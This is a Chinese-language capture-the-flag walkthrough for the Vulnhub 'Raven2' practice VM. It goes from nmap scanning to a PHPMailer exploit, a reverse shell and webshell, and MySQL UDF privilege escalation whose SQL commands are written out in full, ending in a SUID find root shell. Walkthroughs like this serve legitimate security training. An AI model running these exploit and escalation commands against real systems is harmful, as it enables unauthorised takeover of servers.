# Raven2 靶场
# 环境准备:
攻击机:
Kali2021 系统 IP:192.168.226.131
Win10 系统 IP:192.168.226.136
靶场下载地址:
百度网盘链接:https://pan.baidu.com/s/1vbtCDRKse-AZ-VUhoSkbvA 提取码:60zo
或者
vulnhub 下载:https://www.vulnhub.com/entry/raven-2,269/
# 具体步骤:
先进行主机探测
nmap -sP 192.168.226.1/24
得到靶场 IP 为 192.168.226.132
再对该 IP 进行端口扫描
nmap -A 192.168.226.132
发现 22、80、111 端口开放
浏览器访问 80 端口
使用 dirsearch 进行目录扫描
访问扫出来的目录
其中 vendor 目录存在目录遍历
VERSION 中有个版本号
PATH 文件显示了绝对路径
通过 changelog.md 中得到的信息可以推断前面的版本号为 PHPMailer 的版本号
使用 Kali 中的 searchsploit 来查询此 web 应用的漏洞
searchsploit PHPMailer
这里我们选择使用 40974.py,查询下路径
将其 copy 出来
修改下 EXP
其中 target 为 http:// 靶机 IP/contact.php
backdoor 为 生成的后门文件的名字,自定义
payload 中的 IP 改为攻击机的 IP
fields 中 - X 后面改成刚才获取到的绝对路径 / 后门文件
修改完后,运行此 EXP
运行完后访问 http:// 靶机 IP/contact.php
这时就会产生后门文件,NC 监听下端口 4444
访问后门文件后,成功监听到,权限为低权限
由于觉得监听界面不太友好,我就写了个一句话进去
使用蚁剑连接一句话
因为他是存在有 WordPress 的,所以看下 WordPress 的配置文件
获取到 MySQL 得到账号密码 root/R@v3nSecurity
查询下 MySQL 运行权限
为 root 权限
连接下数据库,查询数据库版本
MySQL 版本为 5.5.60
进行 udf 提权
使用 select @@plugin_dir 查看当前数据库扩展插件存放的位置
udf 提权所需的扩展,通过 searchsploit User-Defined Func 查找
此处选用 1518.c,查询其路径,copy 出来
进行编译,生成 .so 文件,上传至 /tmp
加载扩展,进行提权
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/mysql.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/mysql.so';
create function do_system returns integer soname 'mysql.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
完成后执行
touch finn
find finn -exec "/bin/sh" /;
权限为 root,提权完成
也可以上传个 msf 马